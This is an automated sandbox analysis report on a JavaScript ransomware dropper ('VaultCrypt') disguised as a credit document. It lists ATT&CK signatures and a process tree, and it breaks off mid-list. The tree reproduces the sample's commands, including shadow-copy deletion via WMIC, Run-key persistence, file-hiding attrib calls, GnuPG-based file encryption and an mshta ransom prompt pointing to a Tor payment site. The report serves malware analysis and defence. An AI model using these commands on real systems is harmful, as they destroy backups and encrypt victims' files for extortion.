b44b5152e35c72a17a8de9fa89736dacd41edda89139ecef2d135f2aebae497a

Analysis

max time kernel
65s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
02/01/2025, 10:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

document_1543_CREDIT_#346875_17.01.17.js
Size

603KB
MD5

185fba63c25db9d2d63cd4ce519c35b7
SHA1

c4d034ede11dcd493ee28f7fc632a4795d7bf665
SHA256

728b5196ba9efbbc8c422a5aabe02f4fdb5de5e0bdcd8b544f8b95e8b9c259d6
SHA512

a269dd1e57dd5b5b0096e403db98ddd0baff81397d9260c6b7d78751c034325af9a6784fe9025b4c5502c6ebc9dcb0a2627143bc4726fc0307846a38bd928bdf
SSDEEP

12288:qdT6dsvMk7pGWeGG8txvgiaOFbvZe1LfuA/fn5Pq/b:8BGWeRwvcOFbhYLR/f5ub

Score

9^/10

defense_evasion discovery evasion execution impact ransomware spyware stealer upx

Malware Config

Signatures

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Overwrites deleted data with Cipher tool 1 TTPs
Cipher is a Windows tool which be used to securely wipe deallocated HDD space, preventing recovery of deleted data.
ransomware

Inhibit System Recovery
T1490

Sets file to hidden 1 TTPs 1 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
2500	attrib.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	wscript.exe

Executes dropped EXE 2 IoCs

pid	Process
1392	svchost.exe
3956	svchost.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Enumerates processes with tasklist 1 TTPs 1 IoCs

discovery

Process Discovery

T1057

pid	Process
988	tasklist.exe

UPX packed file 25 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000c000000023b76-35.dat	upx
behavioral2/memory/1392-36-0x0000000000400000-0x00000000004F4000-memory.dmp	upx
behavioral2/memory/1392-53-0x0000000000400000-0x00000000004F4000-memory.dmp	upx
behavioral2/memory/3956-72-0x0000000000400000-0x00000000004F4000-memory.dmp	upx
behavioral2/memory/2784-3707-0x0000000000400000-0x00000000004F4000-memory.dmp	upx
behavioral2/memory/1556-3710-0x0000000000400000-0x00000000004F4000-memory.dmp	upx
behavioral2/memory/1556-3715-0x0000000000400000-0x00000000004F4000-memory.dmp	upx
behavioral2/memory/3252-3717-0x0000000000400000-0x00000000004F4000-memory.dmp	upx
behavioral2/memory/3252-3723-0x0000000000400000-0x00000000004F4000-memory.dmp	upx
behavioral2/memory/4680-3822-0x0000000000400000-0x00000000004F4000-memory.dmp	upx
behavioral2/memory/5216-3835-0x0000000000400000-0x00000000004F4000-memory.dmp	upx
behavioral2/memory/2548-3843-0x0000000000400000-0x00000000004F4000-memory.dmp	upx
behavioral2/memory/300-3851-0x0000000000400000-0x00000000004F4000-memory.dmp	upx
behavioral2/memory/5504-3859-0x0000000000400000-0x00000000004F4000-memory.dmp	upx
behavioral2/memory/5540-3866-0x0000000000400000-0x00000000004F4000-memory.dmp	upx
behavioral2/memory/3424-3874-0x0000000000400000-0x00000000004F4000-memory.dmp	upx
behavioral2/memory/3400-3878-0x0000000000400000-0x00000000004F4000-memory.dmp	upx
behavioral2/memory/3400-3883-0x0000000000400000-0x00000000004F4000-memory.dmp	upx
behavioral2/memory/5656-3904-0x0000000000400000-0x00000000004F4000-memory.dmp	upx
behavioral2/memory/5656-3903-0x0000000000400000-0x00000000004F4000-memory.dmp	upx
behavioral2/memory/5704-3912-0x0000000000400000-0x00000000004F4000-memory.dmp	upx
behavioral2/memory/5836-3930-0x0000000000400000-0x00000000004F4000-memory.dmp	upx
behavioral2/memory/5836-3932-0x0000000000400000-0x00000000004F4000-memory.dmp	upx
behavioral2/memory/5852-3936-0x0000000000400000-0x00000000004F4000-memory.dmp	upx
behavioral2/memory/5900-3941-0x0000000000400000-0x00000000004F4000-memory.dmp	upx

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe

Checks processor information in registry 2 TTPs 5 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings	wscript.exe

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
3548	WINWORD.EXE
3548	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe
1392	svchost.exe

Suspicious use of AdjustPrivilegeToken 46 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	3656	WMIC.exe
Token: SeSecurityPrivilege	3656	WMIC.exe
Token: SeTakeOwnershipPrivilege	3656	WMIC.exe
Token: SeLoadDriverPrivilege	3656	WMIC.exe
Token: SeSystemProfilePrivilege	3656	WMIC.exe
Token: SeSystemtimePrivilege	3656	WMIC.exe
Token: SeProfSingleProcessPrivilege	3656	WMIC.exe
Token: SeIncBasePriorityPrivilege	3656	WMIC.exe
Token: SeCreatePagefilePrivilege	3656	WMIC.exe
Token: SeBackupPrivilege	3656	WMIC.exe
Token: SeRestorePrivilege	3656	WMIC.exe
Token: SeShutdownPrivilege	3656	WMIC.exe
Token: SeDebugPrivilege	3656	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3656	WMIC.exe
Token: SeRemoteShutdownPrivilege	3656	WMIC.exe
Token: SeUndockPrivilege	3656	WMIC.exe
Token: SeManageVolumePrivilege	3656	WMIC.exe
Token: 33	3656	WMIC.exe
Token: 34	3656	WMIC.exe
Token: 35	3656	WMIC.exe
Token: 36	3656	WMIC.exe
Token: SeDebugPrivilege	988	tasklist.exe
Token: SeIncreaseQuotaPrivilege	3656	WMIC.exe
Token: SeSecurityPrivilege	3656	WMIC.exe
Token: SeTakeOwnershipPrivilege	3656	WMIC.exe
Token: SeLoadDriverPrivilege	3656	WMIC.exe
Token: SeSystemProfilePrivilege	3656	WMIC.exe
Token: SeSystemtimePrivilege	3656	WMIC.exe
Token: SeProfSingleProcessPrivilege	3656	WMIC.exe
Token: SeIncBasePriorityPrivilege	3656	WMIC.exe
Token: SeCreatePagefilePrivilege	3656	WMIC.exe
Token: SeBackupPrivilege	3656	WMIC.exe
Token: SeRestorePrivilege	3656	WMIC.exe
Token: SeShutdownPrivilege	3656	WMIC.exe
Token: SeDebugPrivilege	3656	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3656	WMIC.exe
Token: SeRemoteShutdownPrivilege	3656	WMIC.exe
Token: SeUndockPrivilege	3656	WMIC.exe
Token: SeManageVolumePrivilege	3656	WMIC.exe
Token: 33	3656	WMIC.exe
Token: 34	3656	WMIC.exe
Token: 35	3656	WMIC.exe
Token: 36	3656	WMIC.exe
Token: SeBackupPrivilege	220	vssvc.exe
Token: SeRestorePrivilege	220	vssvc.exe
Token: SeAuditPrivilege	220	vssvc.exe

Suspicious use of SetWindowsHookEx 9 IoCs

pid	Process
3548	WINWORD.EXE
3548	WINWORD.EXE
3548	WINWORD.EXE
3548	WINWORD.EXE
3548	WINWORD.EXE
3548	WINWORD.EXE
3548	WINWORD.EXE
3548	WINWORD.EXE
3548	WINWORD.EXE

Suspicious use of WriteProcessMemory 30 IoCs

description	pid	Process	procid_target
PID 3000 wrote to memory of 3548	3000	wscript.exe	84
PID 3000 wrote to memory of 3548	3000	wscript.exe	84
PID 3000 wrote to memory of 5112	3000	wscript.exe	85
PID 3000 wrote to memory of 5112	3000	wscript.exe	85
PID 5112 wrote to memory of 2500	5112	cmd.exe	87
PID 5112 wrote to memory of 2500	5112	cmd.exe	87
PID 5112 wrote to memory of 4504	5112	cmd.exe	89
PID 5112 wrote to memory of 4504	5112	cmd.exe	89
PID 5112 wrote to memory of 1392	5112	cmd.exe	90
PID 5112 wrote to memory of 1392	5112	cmd.exe	90
PID 5112 wrote to memory of 1392	5112	cmd.exe	90
PID 5112 wrote to memory of 3956	5112	cmd.exe	96
PID 5112 wrote to memory of 3956	5112	cmd.exe	96
PID 5112 wrote to memory of 3956	5112	cmd.exe	96
PID 5112 wrote to memory of 2480	5112	cmd.exe	110
PID 5112 wrote to memory of 2480	5112	cmd.exe	110
PID 2480 wrote to memory of 3464	2480	wscript.exe	111
PID 2480 wrote to memory of 3464	2480	wscript.exe	111
PID 3464 wrote to memory of 1652	3464	cmd.exe	113
PID 3464 wrote to memory of 1652	3464	cmd.exe	113
PID 1652 wrote to memory of 3148	1652	cmd.exe	114
PID 1652 wrote to memory of 3148	1652	cmd.exe	114
PID 3464 wrote to memory of 1648	3464	cmd.exe	115
PID 3464 wrote to memory of 1648	3464	cmd.exe	115
PID 1648 wrote to memory of 3656	1648	wscript.exe	116
PID 1648 wrote to memory of 3656	1648	wscript.exe	116
PID 3464 wrote to memory of 988	3464	cmd.exe	118
PID 3464 wrote to memory of 988	3464	cmd.exe	118
PID 3464 wrote to memory of 2288	3464	cmd.exe	119
PID 3464 wrote to memory of 2288	3464	cmd.exe	119

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 11 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
6044	attrib.exe
6064	attrib.exe
2500	attrib.exe
1432	attrib.exe
628	attrib.exe
288	attrib.exe
5152	attrib.exe
6008	attrib.exe
6020	attrib.exe
4816	attrib.exe
5008	attrib.exe

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\document_1543_CREDIT_#346875_17.01.17.js
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3000
- C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
  "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\document_S4f6.docx" /o ""
  2⤵
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  PID:3548
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\S6a6.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5112
- - C:\Windows\system32\attrib.exe
    attrib +s +h "C:\Users\Admin\AppData\Local\Temp\41e65d8f.e8ad5491"
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:2500
- - C:\Windows\system32\chcp.com
    chcp 866
    3⤵
    PID:4504
- - C:\Users\Admin\AppData\Local\Temp\svchost.exe
    "C:\Users\Admin\AppData\Local\Temp\svchost.exe" --batch --homedir "C:\Users\Admin\AppData\Local\Temp" --gen-key "C:\Users\Admin\AppData\Local\Temp\c30ada7d.ae716421"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:1392
- - C:\Users\Admin\AppData\Local\Temp\svchost.exe
    "C:\Users\Admin\AppData\Local\Temp\svchost.exe" -r Cellar --export-secret-keys --yes --homedir "C:\Users\Admin\AppData\Local\Temp" -a
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3956
- - C:\Windows\system32\wscript.exe
    wscript.exe //B //Nologo "C:\Users\Admin\AppData\Local\Temp\5e763ca9.js"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:2480
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5387da10.cmd" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3464
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg.exe query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentVersion"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1652
      - C:\Windows\system32\reg.exe
        
        reg.exe query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentVersion"
        6⤵
        
        PID:3148
    - - C:\Windows\system32\wscript.exe
        
        wscript.exe //B //Nologo "C:\Users\Admin\AppData\Local\Temp\aae53d47.vbs"
        5⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:1648
      - C:\Windows\System32\wbem\WMIC.exe
        
        "C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /nointeractive
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3656
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:988
    - - C:\Windows\system32\findstr.exe
        
        findstr /i wmic.exe
        5⤵
        
        PID:2288
- - C:\Windows\system32\findstr.exe
    findstr /i /v "windows recycle program avatar roaming msoffice temporary sample themes uploads csize resource internet com_ intel common resources texture profiles library clipart manual games framework64 setupcache autograph maps amd64 cache support guide abbyy application thumbnails avatars template adobe" "C:\Users\Admin\AppData\Local\Temp\6f064f20.9903f75a"
    3⤵
    PID:3452
- - C:\Windows\system32\findstr.exe
    findstr /i /v "windows recycle program avatar roaming msoffice temporary sample themes uploads csize resource internet com_ intel common resources texture profiles library clipart manual games framework64 setupcache autograph maps amd64 cache support guide abbyy application thumbnails avatars template adobe" "C:\Users\Admin\AppData\Local\Temp\7fbcbc76.f180e30e"
    3⤵
    PID:5648
- - C:\Windows\system32\findstr.exe
    findstr /v "AppData APPDATA appdata temp TEMP Temp" "C:\Users\Admin\AppData\Local\Temp\5de4349d.fb278149"
    3⤵
    PID:5676
- - C:\Windows\system32\findstr.exe
    findstr /v "AppData APPDATA appdata temp TEMP Temp" "C:\Users\Admin\AppData\Local\Temp\e847b6e2.4446ed32"
    3⤵
    PID:5704
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c find /c /v ""< "C:\Users\Admin\AppData\Local\Temp\9618f85b.0faa41ce"
    3⤵
    PID:5728
  - - C:\Windows\system32\find.exe
      find /c /v ""
      4⤵
      PID:5760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c find /c /i ".xls"< "C:\Users\Admin\AppData\Local\Temp\9618f85b.0faa41ce"
    3⤵
    PID:5788
  - - C:\Windows\system32\find.exe
      find /c /i ".xls"
      4⤵
      PID:5780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c find /c /i ".doc"< "C:\Users\Admin\AppData\Local\Temp\9618f85b.0faa41ce"
    3⤵
    PID:5812
  - - C:\Windows\system32\find.exe
      find /c /i ".doc"
      4⤵
      PID:5832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c find /c /i ".rtf"< "C:\Users\Admin\AppData\Local\Temp\9618f85b.0faa41ce"
    3⤵
    PID:5856
  - - C:\Windows\system32\find.exe
      find /c /i ".rtf"
      4⤵
      PID:5868
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c find /c /i ".pdf"< "C:\Users\Admin\AppData\Local\Temp\9618f85b.0faa41ce"
    3⤵
    PID:5876
  - - C:\Windows\system32\find.exe
      find /c /i ".pdf"
      4⤵
      PID:5896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c find /c /i ".psd"< "C:\Users\Admin\AppData\Local\Temp\9618f85b.0faa41ce"
    3⤵
    PID:5924
  - - C:\Windows\system32\find.exe
      find /c /i ".psd"
      4⤵
      PID:5952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c find /c /i ".dwg"< "C:\Users\Admin\AppData\Local\Temp\9618f85b.0faa41ce"
    3⤵
    PID:5936
  - - C:\Windows\system32\find.exe
      find /c /i ".dwg"
      4⤵
      PID:5972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c find /c /i ".cdr"< "C:\Users\Admin\AppData\Local\Temp\9618f85b.0faa41ce"
    3⤵
    PID:5396
  - - C:\Windows\system32\find.exe
      find /c /i ".cdr"
      4⤵
      PID:5948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c find /c /i ".cd"< "C:\Users\Admin\AppData\Local\Temp\9618f85b.0faa41ce"
    3⤵
    PID:5980
  - - C:\Windows\system32\find.exe
      find /c /i ".cd"
      4⤵
      PID:6004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c find /c /i ".mdb"< "C:\Users\Admin\AppData\Local\Temp\9618f85b.0faa41ce"
    3⤵
    PID:5136
  - - C:\Windows\system32\find.exe
      find /c /i ".mdb"
      4⤵
      PID:6028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c find /c /i ".1cd"< "C:\Users\Admin\AppData\Local\Temp\9618f85b.0faa41ce"
    3⤵
    PID:6048
  - - C:\Windows\system32\find.exe
      find /c /i ".1cd"
      4⤵
      PID:5420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c find /c /i ".dbf"< "C:\Users\Admin\AppData\Local\Temp\9618f85b.0faa41ce"
    3⤵
    PID:6052
  - - C:\Windows\system32\find.exe
      find /c /i ".dbf"
      4⤵
      PID:6088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c find /c /i ".sqlite"< "C:\Users\Admin\AppData\Local\Temp\9618f85b.0faa41ce"
    3⤵
    PID:3844
  - - C:\Windows\system32\find.exe
      find /c /i ".sqlite"
      4⤵
      PID:5076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c find /c /i ".jpg"< "C:\Users\Admin\AppData\Local\Temp\9618f85b.0faa41ce"
    3⤵
    PID:6120
  - - C:\Windows\system32\find.exe
      find /c /i ".jpg"
      4⤵
      PID:6132
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c find /c /i ".zip"< "C:\Users\Admin\AppData\Local\Temp\9618f85b.0faa41ce"
    3⤵
    PID:2832
  - - C:\Windows\system32\find.exe
      find /c /i ".zip"
      4⤵
      PID:4008
- - C:\Users\Admin\AppData\Local\Temp\svchost.exe
    "C:\Users\Admin\AppData\Local\Temp\svchost.exe" --import "C:\Users\Admin\AppData\Local\Temp\b528dbf1.cab3c453"
    3⤵
    PID:2784
- - C:\Users\Admin\AppData\Local\Temp\svchost.exe
    "C:\Users\Admin\AppData\Local\Temp\svchost.exe" -r VaultCrypt --yes -q --no-verbose --trust-model always -o "C:\Users\Admin\AppData\Local\Temp\VAULT.KEY" -e "C:\Users\Admin\AppData\Local\Temp\49f83a48.a766bd5e"
    3⤵
    PID:1556
- - C:\Users\Admin\AppData\Local\Temp\svchost.exe
    "C:\Users\Admin\AppData\Local\Temp\svchost.exe" -r VaultCrypt --yes -q --no-verbose --trust-model always -o "C:\Users\Admin\AppData\Local\Temp\CONFIRMATION.KEY" -e "C:\Users\Admin\AppData\Local\Temp\9618f85b.0faa41ce"
    3⤵
    PID:3252
- - C:\Windows\system32\attrib.exe
    attrib -s -h -r "C:\Users\Admin\AppData\Roaming\gnupg\*.*"
    3⤵
    - Views/modifies file attributes
    PID:1432
- - C:\Windows\system32\attrib.exe
    attrib -s -h -r "C:\Users\Admin\AppData\Roaming\gnupg"
    3⤵
    - Views/modifies file attributes
    PID:628
- - C:\Windows\system32\attrib.exe
    attrib +r "C:\Users\Admin\AppData\Local\Temp\fdc89ee9_VAULT.KEY"
    3⤵
    - Views/modifies file attributes
    PID:288
- - C:\Windows\system32\attrib.exe
    attrib +h "C:\Users\Admin\Desktop\vault.txt"
    3⤵
    - Views/modifies file attributes
    PID:5152
- - C:\Users\Admin\AppData\Local\Temp\svchost.exe
    "C:\Users\Admin\AppData\Local\Temp\svchost.exe" --import "C:\Users\Admin\AppData\Local\Temp\pubring.gpg"
    3⤵
    PID:4680
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "75ea37eb" /t REG_SZ /f /d "notepad C:\Users\Admin\AppData\Local\Temp\VAULT.txt"
    3⤵
    PID:5192
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "04f94347" /t REG_SZ /f /d "attrib -h C:\Users\Admin\Desktop\vault.txt"
    3⤵
    PID:5208
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "d21edf35" /t REG_SZ /f /d "wscript //B //Nologo C:\Users\Admin\AppData\Local\Temp\ffbc01a6.js"
    3⤵
    PID:912
- - C:\Windows\system32\chcp.com
    chcp 866
    3⤵
    PID:5256
- - C:\Users\Admin\AppData\Local\Temp\svchost.exe
    "C:\Users\Admin\AppData\Local\Temp\svchost.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "C:\Users\Admin\Desktop\CompleteBackup.xlsx"
    3⤵
    PID:5216
- - C:\Users\Admin\AppData\Local\Temp\svchost.exe
    "C:\Users\Admin\AppData\Local\Temp\svchost.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "C:\Users\Admin\Desktop\ResizeSave.docx"
    3⤵
    PID:2548
- - C:\Users\Admin\AppData\Local\Temp\svchost.exe
    "C:\Users\Admin\AppData\Local\Temp\svchost.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "C:\Users\Admin\Documents\RenameCompare.xls"
    3⤵
    PID:300
- - C:\Users\Admin\AppData\Local\Temp\svchost.exe
    "C:\Users\Admin\AppData\Local\Temp\svchost.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "C:\Users\Admin\Documents\CompareSelect.docx"
    3⤵
    PID:5504
- - C:\Users\Admin\AppData\Local\Temp\svchost.exe
    "C:\Users\Admin\AppData\Local\Temp\svchost.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "C:\Users\Admin\Music\JoinStop.xls"
    3⤵
    PID:5540
- - C:\Users\Admin\AppData\Local\Temp\svchost.exe
    "C:\Users\Admin\AppData\Local\Temp\svchost.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "C:\Users\Admin\Music\ResizeSelect.docx"
    3⤵
    PID:3424
- - C:\Users\Admin\AppData\Local\Temp\svchost.exe
    "C:\Users\Admin\AppData\Local\Temp\svchost.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "C:\Users\Admin\Music\StopRedo.docx"
    3⤵
    PID:3400
- - C:\Users\Admin\AppData\Local\Temp\svchost.exe
    "C:\Users\Admin\AppData\Local\Temp\svchost.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "C:\Users\Admin\Desktop\SyncStep.dwg"
    3⤵
    PID:5656
- - C:\Users\Admin\AppData\Local\Temp\svchost.exe
    "C:\Users\Admin\AppData\Local\Temp\svchost.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "C:\Users\Admin\Downloads\UseStop.dwg"
    3⤵
    PID:5704
- - C:\Users\Admin\AppData\Local\Temp\svchost.exe
    "C:\Users\Admin\AppData\Local\Temp\svchost.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "C:\Users\Admin\Downloads\UseAssert.zip"
    3⤵
    PID:5836
- - C:\Users\Admin\AppData\Local\Temp\svchost.exe
    "C:\Users\Admin\AppData\Local\Temp\svchost.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "C:\Users\Admin\Music\InitializeConfirm.jpg"
    3⤵
    PID:5852
- - C:\Users\Admin\AppData\Local\Temp\svchost.exe
    "C:\Users\Admin\AppData\Local\Temp\svchost.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "C:\Users\Admin\Pictures\My Wallpaper.jpg"
    3⤵
    PID:5900
- - C:\Windows\system32\attrib.exe
    attrib +h "C:\Users\Admin\AppData\Roaming\05b07f23c0ce0d72.hta"
    3⤵
    - Views/modifies file attributes
    PID:6008
- - C:\Windows\system32\attrib.exe
    attrib +r +s "C:\Users\Admin\AppData\Local\Temp\VAULT.KEY"
    3⤵
    - Views/modifies file attributes
    PID:6020
- - C:\Windows\system32\attrib.exe
    attrib +r +s "C:\Users\Admin\AppData\Roaming\VAULT.KEY"
    3⤵
    - Views/modifies file attributes
    PID:6044
- - C:\Windows\system32\attrib.exe
    attrib +r +s "C:\Users\Admin\Desktop\VAULT.KEY"
    3⤵
    - Views/modifies file attributes
    PID:6064
- - C:\Windows\system32\wscript.exe
    wscript.exe //B //Nologo //T:120 "C:\Users\Admin\AppData\Local\Temp\d6351d55.js"
    3⤵
    PID:1776
- - C:\Windows\system32\attrib.exe
    attrib -h -s "C:\Users\Admin\AppData\Local\Temp\41e65d8f.e8ad5491"
    3⤵
    - Views/modifies file attributes
    PID:4816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:384
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" assoc .vault=b509f26d"
    3⤵
    PID:3148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" ftype "b509f26d"=mshta.exe vbscript:Execute("msgbox "" BLOCKED:""&vbNewLine&"" %1""&vbNewLine&vbNewLine&ChrW(10139)&"" KEY PURCHASE: http://restoredz4xpmuqr.onion""&vbNewLine&vbNewLine&"" [accessible only via Tor Browser: http://torproject.org]"",16,""VaultCrypt [Need to purchase key]"":close")"
    3⤵
    PID:2240
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:5016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" assoc "b509f26d"\DefaultIcon=C:\Windows\System32\shell32.dll,-48"
    3⤵
    PID:3620
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "da3962c3" /t REG_SZ /f /d "mshta C:\Users\Admin\AppData\Roaming\05b07f23c0ce0d72.hta"
    3⤵
    PID:3000
- - C:\Windows\system32\reg.exe
